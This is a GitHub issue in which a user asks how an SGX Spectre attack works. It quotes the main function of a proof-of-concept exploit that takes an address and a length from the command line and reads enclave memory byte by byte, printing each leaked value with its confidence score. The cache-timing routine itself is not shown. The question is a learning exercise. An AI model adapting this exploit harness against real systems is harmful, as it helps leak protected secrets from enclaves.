Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Working mechanism of sgx spectre attack #3

Open
buttercutter opened this issue Apr 16, 2020 · 0 comments
Open

Working mechanism of sgx spectre attack #3

buttercutter opened this issue Apr 16, 2020 · 0 comments

Comments

@buttercutter
Copy link

Could anyone explain the working mechanism of sgx spectre attack ?

How is ecall_get_offset() caching function actually used in this sgx spectre exploit ?

int spectre_main(int argc, char **argv) {
	size_t malicious_x; 
	sgx_status_t ret  = ecall_get_offset(global_eid, &malicious_x); /* default for malicious_x */
	if (ret != SGX_SUCCESS)
        	abort();

	
	int i, score[2], len=40;
	uint8_t value[2];
	
	for (i = 0; i < sizeof(array2); i++)
		array2[i] = 1; /* write to array2 so in RAM not copy-on-write zero pages */

	if (argc == 3) {
		sscanf(argv[1], "%p", (void**)(&malicious_x));
		malicious_x -= (size_t)array1dupe; /* Convert input value into a pointer */
		sscanf(argv[2], "%d", &len);
	}
	
	printf("Reading %d bytes:\n", len);
	
	while (--len >= 0) {
		printf("Reading at malicious_x = %p... ", (void*)malicious_x);
		readMemoryByte(malicious_x++, value, score);
		printf("%s: ", (score[0] >= 2*score[1] ? "Success" : "Unclear"));
		printf("0x%02X='%c' score=%d ", value[0], (value[0] > 31 && value[0] < 127 ? value[0] : '?'), score[0]);
		if (score[1] > 0)
			printf("(second best: 0x%02X score=%d)", value[1], score[1]);
		printf("\n");
	}

	return (0);
 }
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

1 participant